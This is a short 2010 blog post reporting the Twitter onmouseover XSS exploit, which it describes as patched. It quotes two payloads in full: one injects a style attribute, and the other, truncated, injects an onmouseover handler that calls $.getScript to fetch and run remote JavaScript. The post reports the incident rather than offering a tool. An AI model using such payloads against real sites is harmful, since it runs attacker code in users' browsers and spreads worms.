• Home
  • Blog
  • About
  • Contact
CloudAve
Software in Business. The Business of Software.
  • Business
    • Analysis
    • Entrepreneurship
    • Marketing
    • Strategy
    • Small business
  • Technology
    • Application Software
    • Infrastructure
    • Open Source
    • Mobile
    • Platforms
    • Product reviews
    • Security
  • Misc
    • Design
    • Just for fun
    • Trends & Concepts
  • Your POV
  • Sponsors
Browse: Home / XSS vulnerability on twitter.com

XSS vulnerability on twitter.com

By Guest Authors on September 21, 2010

So Judofyr found a XSS-exploit on Twitter.com and within minutes it spreaded like wildfire. His original tweet just set the anchor background color to black but his next tweet included onmouseover and people could not stop moving the mouse over the tweet resulting in over 40000 tweets within 10 minutes.

The exploit:

http://judofyr.net/@"style="background:#000;color:#000;/

So Twitter does not encode the URL and whatever is after the @ gets included in the anchor. So css and javascript can be included.

Shortly after someone else created a more evil approach:


http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:u002fu002fis.gdu002ffl9A ...

Update:  This exploit is now patched.

(Cross-posted @ Inspired? No)

Post Views: 0

Share:

  • Twitter
  • Facebook
  • LinkedIn

Posted in Security | Tagged social networking, twitter, twitter exploit, xss

Guest Authors

« Previous Next »
feed mail facebook twitter linkedin

Sponsor Posts

    No feed items found.

    No feed items found.

Cloud Tweets

Tweets from @ZoliErdos/cloudave-widget

Popular Posts

  • What Makes an Entrepreneur? Four Letters: JFDI
  • Home
  • iPad’s Climb Up the Disruptive Innovation Cycle
  • Blog
  • OpenDNS? Google DNS? Comcast? Surprising Results.
  • About
  • Gluster Introduces Scale-Out NAS Virtual Storage Appliances For VMware and AWS
  • Carrot Beats Stick

Archives

Authors

  • Adron Hall
  • Chirag Mehta
  • Christian Reilly
  • Dan Morrill
  • Derek Pilling
  • Hutch Carpenter
  • Jarret Pazahanick
  • Jason M. Lemkin
  • Joel York
  • John Taschek
  • Krishnan Subramanian
  • Mark Suster
  • Michael Krigsman
  • Ofir Nachmani
  • Paul Miller
  • Quinton Wall
  • Randy Bias
  • Robert Duffner
  • Sadagopan
  • wprss
  • Zoli Erdos
Sponsored by: